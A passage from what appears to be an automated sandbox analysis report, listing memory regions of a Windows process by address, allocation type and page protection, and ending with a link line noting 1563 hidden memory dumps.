page read and write
|
||
216AF7BF000
|
trusted library allocation
|
page read and write
|
||
20561A10000
|
direct allocation
|
page read and write
|
||
7FFC12EC5000
|
unkown
|
page readonly
|
||
24AAE962000
|
heap
|
page read and write
|
||
2833846C000
|
heap
|
page read and write
|
||
2DF6EE30000
|
heap
|
page read and write
|
||
D5AF0F7000
|
stack
|
page read and write
|
||
21CA0FC3000
|
trusted library allocation
|
page read and write
|
||
24AAE8F0000
|
heap
|
page read and write
|
||
7FFBABBF0000
|
trusted library allocation
|
page read and write
|
||
BEF1CFC000
|
stack
|
page read and write
|
||
24AAE96A000
|
heap
|
page read and write
|
||
7FF79BBC1000
|
unkown
|
page execute read
|
||
24AAE920000
|
heap
|
page read and write
|
||
7FFBABBA0000
|
trusted library allocation
|
page read and write
|
||
7FFBABA80000
|
trusted library allocation
|
page execute and read and write
|
||
7FFBABC60000
|
trusted library allocation
|
page read and write
|
||
21CA322C000
|
trusted library allocation
|
page read and write
|
||
216C6BB7000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
2B1B7C48000
|
heap
|
page read and write
|
||
7FF6A42E3000
|
unkown
|
page read and write
|
||
24AAE27B000
|
heap
|
page read and write
|
||
242AB679000
|
heap
|
page read and write
|
||
1D34BE68000
|
heap
|
page read and write
|
||
24AAE8FC000
|
heap
|
page read and write
|
||
216B03CE000
|
trusted library allocation
|
page read and write
|
||
28338413000
|
heap
|
page read and write
|
||
EEFA8FE000
|
stack
|
page read and write
|
||
216AF7A7000
|
trusted library allocation
|
page read and write
|
||
21C9F690000
|
trusted library allocation
|
page read and write
|
||
EEFA77F000
|
stack
|
page read and write
|
||
21CA21F7000
|
trusted library allocation
|
page read and write
|
||
7FFC120CE000
|
unkown
|
page read and write
|
||
20561A90000
|
direct allocation
|
page read and write
|
||
2DF6D30E000
|
heap
|
page read and write
|
||
7FFC0F7C0000
|
unkown
|
page readonly
|
||
216C68AF000
|
heap
|
page read and write
|
||
1D34BF02000
|
heap
|
page read and write
|
||
24AAE75E000
|
heap
|
page read and write
|
||
216AF724000
|
trusted library allocation
|
page read and write
|
||
7FFC12E9B000
|
unkown
|
page readonly
|
||
24AAE07F000
|
heap
|
page read and write
|
||
24AAE74B000
|
heap
|
page read and write
|
||
216AF71B000
|
trusted library allocation
|
page read and write
|
||
77E397E000
|
stack
|
page read and write
|
||
21CB96B0000
|
trusted library allocation
|
page read and write
|
||
D92F67E000
|
stack
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
242AB650000
|
heap
|
page read and write
|
||
7FFBABC20000
|
trusted library allocation
|
page read and write
|
||
2B1B7C57000
|
heap
|
page read and write
|
||
7FFC12F40000
|
unkown
|
page readonly
|
||
216AF85E000
|
trusted library allocation
|
page read and write
|
||
24AAE9C5000
|
heap
|
page read and write
|
||
7FFC12EE0000
|
unkown
|
page readonly
|
||
BEF1A7E000
|
stack
|
page read and write
|
||
24AAE93F000
|
heap
|
page read and write
|
||
20561A50000
|
direct allocation
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
24AAE272000
|
heap
|
page read and write
|
||
7FF79BF4F000
|
unkown
|
page write copy
|
||
24AAE1CE000
|
heap
|
page read and write
|
||
1D34BDA0000
|
trusted library allocation
|
page read and write
|
||
21C9F645000
|
heap
|
page read and write
|
||
2055F2DC000
|
heap
|
page read and write
|
||
2B1B7C02000
|
heap
|
page read and write
|
||
2DF6D2F6000
|
heap
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
21CB98A8000
|
heap
|
page read and write
|
||
2056171A000
|
heap
|
page read and write
|
||
28F30643000
|
heap
|
page read and write
|
||
2833845D000
|
heap
|
page read and write
|
||
EEFAB7D000
|
stack
|
page read and write
|
||
24AAE7D2000
|
heap
|
page read and write
|
||
28F30F39000
|
heap
|
page read and write
|
||
216AF2A9000
|
trusted library allocation
|
page read and write
|
||
21CB9850000
|
heap
|
page read and write
|
||
24AAE019000
|
heap
|
page read and write
|
||
2055F9B5000
|
heap
|
page read and write
|
||
23F97D60000
|
heap
|
page read and write
|
||
216C69F0000
|
trusted library allocation
|
page read and write
|
||
216C68C2000
|
heap
|
page read and write
|
||
7FFC12FF1000
|
unkown
|
page execute read
|
||
24AAE075000
|
heap
|
page read and write
|
||
7FFBABBF0000
|
trusted library allocation
|
page read and write
|
||
7FFC0FDE4000
|
unkown
|
page readonly
|
||
216C6B40000
|
remote allocation
|
page read and write
|
||
24AAE909000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
20561781000
|
heap
|
page read and write
|
||
20561570000
|
direct allocation
|
page read and write
|
||
BEF1EFD000
|
stack
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
7FFC21E10000
|
unkown
|
page readonly
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
21CB14E2000
|
trusted library allocation
|
page read and write
|
||
216C67E0000
|
heap
|
page read and write
|
||
2833848F000
|
heap
|
page read and write
|
||
2B1B7C7D000
|
heap
|
page read and write
|
||
7FFC12E90000
|
unkown
|
page readonly
|
||
216C68CF000
|
heap
|
page read and write
|
||
24AAD810000
|
trusted library allocation
|
page read and write
|
||
7FFC1EC83000
|
unkown
|
page readonly
|
||
7FFC0F7CD000
|
unkown
|
page execute read
|
||
21CA3021000
|
trusted library allocation
|
page read and write
|
||
24AAE069000
|
heap
|
page read and write
|
||
22658213000
|
heap
|
page read and write
|
||
24AAE914000
|
heap
|
page read and write
|
||
D92F3B7000
|
stack
|
page read and write
|
||
28F306C6000
|
heap
|
page read and write
|
||
28338390000
|
trusted library allocation
|
page read and write
|
||
21CA1447000
|
heap
|
page execute and read and write
|
||
20BEEC54000
|
heap
|
page read and write
|
||
216AF894000
|
trusted library allocation
|
page read and write
|
||
2055F464000
|
heap
|
page read and write
|
||
EEFA2BB000
|
stack
|
page read and write
|
||
20561C90000
|
heap
|
page read and write
|
||
21CA2C49000
|
trusted library allocation
|
page read and write
|
||
216C6BE8000
|
heap
|
page read and write
|
||
7FFC11F32000
|
unkown
|
page readonly
|
||
28338457000
|
heap
|
page read and write
|
||
21CB959D000
|
heap
|
page read and write
|
||
24AAE8F5000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
7FFC0FB10000
|
unkown
|
page readonly
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
242AB4D0000
|
heap
|
page read and write
|
||
77E367F000
|
stack
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
205617C7000
|
heap
|
page read and write
|
||
2055F830000
|
direct allocation
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
24AAE0A7000
|
heap
|
page read and write
|
||
28338DB0000
|
heap
|
page read and write
|
||
28F30F00000
|
heap
|
page read and write
|
||
216C68AF000
|
heap
|
page read and write
|
||
8EB97BB000
|
stack
|
page read and write
|
||
7FFC12FE0000
|
unkown
|
page readonly
|
||
24AAE06B000
|
heap
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
23F97E41000
|
heap
|
page read and write
|
||
2055F8F0000
|
heap
|
page read and write
|
||
7FFBABD20000
|
trusted library allocation
|
page read and write
|
||
20562120000
|
direct allocation
|
page read and write
|
||
28338D02000
|
heap
|
page read and write
|
||
8EBA1FF000
|
stack
|
page read and write
|
||
7FFC1206C000
|
unkown
|
page readonly
|
||
2056165E000
|
heap
|
page read and write
|
||
2055F32E000
|
heap
|
page read and write
|
||
216C686E000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
2055F7F0000
|
direct allocation
|
page read and write
|
||
7FFC12E61000
|
unkown
|
page readonly
|
||
7FFBABD40000
|
trusted library allocation
|
page read and write
|
||
216AE720000
|
heap
|
page execute and read and write
|
||
20BEEC3E000
|
heap
|
page read and write
|
||
21CB95EB000
|
heap
|
page read and write
|
||
216C6853000
|
heap
|
page read and write
|
||
24AAE95F000
|
heap
|
page read and write
|
||
7FFC12F15000
|
unkown
|
page readonly
|
||
216C68AD000
|
heap
|
page read and write
|
||
2B1B8402000
|
trusted library allocation
|
page read and write
|
||
22659C02000
|
trusted library allocation
|
page read and write
|
||
D930A8E000
|
stack
|
page read and write
|
||
216AF8E1000
|
trusted library allocation
|
page read and write
|
||
2833846A000
|
heap
|
page read and write
|
||
FA083FE000
|
stack
|
page read and write
|
||
2B1B7C79000
|
heap
|
page read and write
|
||
7FFC12F42000
|
unkown
|
page readonly
|
||
24AAE7D2000
|
heap
|
page read and write
|
||
24AAE20E000
|
heap
|
page read and write
|
||
7FFC11E60000
|
unkown
|
page readonly
|
||
7FF6A42EF000
|
unkown
|
page readonly
|
||
216AF5F7000
|
trusted library allocation
|
page read and write
|
||
2B19159000
|
stack
|
page read and write
|
||
2055F272000
|
heap
|
page read and write
|
||
20BEEC46000
|
heap
|
page read and write
|
||
77E478F000
|
stack
|
page read and write
|
||
22288C57000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
21CB9638000
|
heap
|
page read and write
|
||
216B0174000
|
trusted library allocation
|
page read and write
|
||
216AF727000
|
trusted library allocation
|
page read and write
|
||
1D34BE02000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
2DF6D4F4000
|
heap
|
page read and write
|
||
21CB1481000
|
trusted library allocation
|
page read and write
|
||
24AAE9C3000
|
heap
|
page read and write
|
||
7FFC1209E000
|
unkown
|
page write copy
|
||
21CB96A4000
|
trusted library allocation
|
page read and write
|
||
24AAE962000
|
heap
|
page read and write
|
||
7FFBABC17000
|
trusted library allocation
|
page read and write
|
||
205619D0000
|
direct allocation
|
page read and write
|
||
2055F230000
|
heap
|
page read and write
|
||
28338D54000
|
heap
|
page read and write
|
||
7FFBABC50000
|
trusted library allocation
|
page read and write
|
||
300B0FC000
|
stack
|
page read and write
|
||
2B1B7C42000
|
heap
|
page read and write
|
||
7FFC1ED95000
|
unkown
|
page readonly
|
||
242AB880000
|
trusted library allocation
|
page read and write
|
||
24AAE9C5000
|
heap
|
page read and write
|
||
242AB679000
|
heap
|
page read and write
|
||
216AF677000
|
trusted library allocation
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
28338D90000
|
heap
|
page read and write
|
||
2055F2B9000
|
heap
|
page read and write
|
||
7FFC12EA0000
|
unkown
|
page readonly
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
7FFC0F79D000
|
unkown
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
216C68B2000
|
heap
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
216C67D0000
|
heap
|
page execute and read and write
|
||
7FFC0FA32000
|
unkown
|
page readonly
|
||
216AF32C000
|
trusted library allocation
|
page read and write
|
||
2055F2F9000
|
heap
|
page read and write
|
||
24AAE75C000
|
heap
|
page read and write
|
||
21CB968C000
|
heap
|
page read and write
|
||
28338D43000
|
heap
|
page read and write
|
||
216BE8D4000
|
trusted library allocation
|
page read and write
|
||
21CA14E2000
|
trusted library allocation
|
page read and write
|
||
216C6848000
|
heap
|
page read and write
|
||
2056164D000
|
heap
|
page read and write
|
||
216C6B93000
|
heap
|
page read and write
|
||
7FFBABA30000
|
trusted library allocation
|
page read and write
|
||
24AAE086000
|
heap
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
216AE1B5000
|
heap
|
page read and write
|
||
8EBA17E000
|
stack
|
page read and write
|
||
20561C00000
|
direct allocation
|
page read and write
|
||
7FFBABB80000
|
trusted library allocation
|
page read and write
|
||
23F97E29000
|
heap
|
page read and write
|
||
216AC84F000
|
heap
|
page read and write
|
||
7FFC11FD0000
|
unkown
|
page readonly
|
||
7FFBAB9D3000
|
trusted library allocation
|
page read and write
|
||
216AC81B000
|
heap
|
page read and write
|
||
9ACD7FB000
|
stack
|
page read and write
|
||
7FFC12F16000
|
unkown
|
page read and write
|
||
24AAE754000
|
heap
|
page read and write
|
||
24AAE9DF000
|
heap
|
page read and write
|
||
7FFC12F24000
|
unkown
|
page readonly
|
||
24AAE7B7000
|
heap
|
page read and write
|
||
23F97F02000
|
heap
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
2055FB60000
|
direct allocation
|
page read and write
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
2B1B7C32000
|
heap
|
page read and write
|
||
2B1B7C5A000
|
heap
|
page read and write
|
||
28338370000
|
trusted library allocation
|
page read and write
|
||
7FFBABC00000
|
trusted library allocation
|
page read and write
|
||
D92F7FE000
|
stack
|
page read and write
|
||
28F30E02000
|
heap
|
page read and write
|
||
21C9F6B0000
|
trusted library allocation
|
page read and write
|
||
20562230000
|
direct allocation
|
page read and write
|
||
7FFC12EF5000
|
unkown
|
page readonly
|
||
7FFC11FB0000
|
unkown
|
page readonly
|
||
7FFC0FAF9000
|
unkown
|
page readonly
|
||
216C67C3000
|
trusted library allocation
|
page read and write
|
||
28F30600000
|
heap
|
page read and write
|
||
21C9F73C000
|
heap
|
page read and write
|
||
216AF706000
|
trusted library allocation
|
page read and write
|
||
24AAE90B000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
22658240000
|
heap
|
page read and write
|
||
1D34BD00000
|
heap
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
24AAE074000
|
heap
|
page read and write
|
||
D92FDFB000
|
stack
|
page read and write
|
||
2055F300000
|
heap
|
page read and write
|
||
28F306BF000
|
heap
|
page read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
1D34BE3C000
|
heap
|
page read and write
|
||
21C9F72B000
|
heap
|
page read and write
|
||
7FFC11FB1000
|
unkown
|
page execute read
|
||
20BEEA90000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
7FFBABC90000
|
trusted library allocation
|
page read and write
|
||
24AAE018000
|
heap
|
page read and write
|
||
7FFC12067000
|
unkown
|
page write copy
|
||
216AE0E0000
|
heap
|
page read and write
|
||
D92FCFE000
|
stack
|
page read and write
|
||
216AF8D8000
|
trusted library allocation
|
page read and write
|
||
7FFC1ED80000
|
unkown
|
page readonly
|
||
24AAE831000
|
heap
|
page read and write
|
||
21C9F650000
|
heap
|
page read and write
|
||
21CA2190000
|
trusted library allocation
|
page read and write
|
||
216C686A000
|
heap
|
page read and write
|
||
24AAD684000
|
heap
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
7FFC12080000
|
unkown
|
page readonly
|
||
21CB98D6000
|
heap
|
page read and write
|
||
216AF8E4000
|
trusted library allocation
|
page read and write
|
||
28F306CE000
|
heap
|
page read and write
|
||
24AAE9EA000
|
heap
|
page read and write
|
||
216ACAC0000
|
heap
|
page read and write
|
||
2B1B7C3D000
|
heap
|
page read and write
|
||
22288C02000
|
heap
|
page read and write
|
||
FA082FC000
|
stack
|
page read and write
|
||
7FFBAB9CD000
|
trusted library allocation
|
page execute and read and write
|
||
28F3066E000
|
heap
|
page read and write
|
||
2B1B7C56000
|
heap
|
page read and write
|
||
7FFC0F84A000
|
unkown
|
page execute read
|
||
22658160000
|
trusted library allocation
|
page read and write
|
||
21CA3234000
|
trusted library allocation
|
page read and write
|
||
7FFBABB34000
|
trusted library allocation
|
page read and write
|
||
7FFC12F00000
|
unkown
|
page readonly
|
||
20561716000
|
heap
|
page read and write
|
||
BEF1BFC000
|
stack
|
page read and write
|
||
2265824B000
|
heap
|
page read and write
|
||
24AAE761000
|
heap
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
7FFBABBE0000
|
trusted library allocation
|
page read and write
|
||
216C6819000
|
heap
|
page read and write
|
||
21CB9590000
|
heap
|
page read and write
|
||
28338D22000
|
heap
|
page read and write
|
||
D930A0C000
|
stack
|
page read and write
|
||
216C67A0000
|
trusted library allocation
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
205616C7000
|
heap
|
page read and write
|
||
242AB638000
|
heap
|
page read and write
|
||
24AAE75C000
|
heap
|
page read and write
|
||
20561990000
|
direct allocation
|
page read and write
|
||
20561751000
|
heap
|
page read and write
|
||
7FFBABC70000
|
trusted library allocation
|
page read and write
|
||
24AAE08A000
|
heap
|
page read and write
|
||
7FFC12F01000
|
unkown
|
page execute read
|
||
7FFC12F31000
|
unkown
|
page execute read
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
7FFC0FAD6000
|
unkown
|
page read and write
|
||
7FFC12044000
|
unkown
|
page readonly
|
||
7FFC120C0000
|
unkown
|
page readonly
|
||
2B1B7C6A000
|
heap
|
page read and write
|
||
7FFBAB980000
|
trusted library allocation
|
page read and write
|
||
28F30664000
|
heap
|
page read and write
|
||
2B1B7D02000
|
heap
|
page read and write
|
||
7FFC12E43000
|
unkown
|
page readonly
|
||
216AC85C000
|
heap
|
page read and write
|
||
216C6B91000
|
heap
|
page read and write
|
||
216B01AE000
|
trusted library allocation
|
page read and write
|
||
22288D13000
|
heap
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
7FFC0FADD000
|
unkown
|
page readonly
|
||
2B1B7C13000
|
heap
|
page read and write
|
||
BCF057E000
|
stack
|
page read and write
|
||
2DF6D2C9000
|
heap
|
page read and write
|
||
7FFBAB990000
|
trusted library allocation
|
page read and write
|
||
23F97E13000
|
heap
|
page read and write
|
||
24AAE199000
|
heap
|
page read and write
|
||
23F97D50000
|
heap
|
page read and write
|
||
22658249000
|
heap
|
page read and write
|
||
7FFBABBC0000
|
trusted library allocation
|
page read and write
|
||
21C9F73A000
|
heap
|
page read and write
|
||
24AAE901000
|
heap
|
page read and write
|
||
20BEEC29000
|
heap
|
page read and write
|
||
2DF6D280000
|
heap
|
page read and write
|
||
7FFC1302C000
|
unkown
|
page readonly
|
||
24AAE8F4000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
21CA2236000
|
trusted library allocation
|
page read and write
|
||
24AAE243000
|
heap
|
page read and write
|
||
300B87C000
|
stack
|
page read and write
|
||
24AAE08B000
|
heap
|
page read and write
|
||
2B19ADE000
|
stack
|
page read and write
|
||
216AF881000
|
trusted library allocation
|
page read and write
|
||
1D34BF13000
|
heap
|
page read and write
|
||
21CB96A1000
|
trusted library allocation
|
page read and write
|
||
7FFC12F41000
|
unkown
|
page execute read
|
||
24AAE96A000
|
heap
|
page read and write
|
||
24AAE9E4000
|
heap
|
page read and write
|
||
7FFBABC60000
|
trusted library allocation
|
page read and write
|
||
216AF712000
|
trusted library allocation
|
page read and write
|
||
7FFC0F640000
|
unkown
|
page readonly
|
||
24AAE020000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
21CB9671000
|
heap
|
page read and write
|
||
22288C00000
|
heap
|
page read and write
|
||
21CB97C0000
|
trusted library allocation
|
page read and write
|
||
2055F32F000
|
heap
|
page read and write
|
||
21CA2FE8000
|
trusted library allocation
|
page read and write
|
||
8FDEBFF000
|
stack
|
page read and write
|
||
242AB64D000
|
heap
|
page read and write
|
||
2B1B7C73000
|
heap
|
page read and write
|
||
24AAE858000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
24AAE23D000
|
heap
|
page read and write
|
||
D92F3FF000
|
stack
|
page read and write
|
||
28338443000
|
heap
|
page read and write
|
||
7FFBABCE0000
|
trusted library allocation
|
page read and write
|
||
8EB9DFC000
|
stack
|
page read and write
|
||
7FF6A42DC000
|
unkown
|
page read and write
|
There are 1563 hidden memdumps, click here to show them.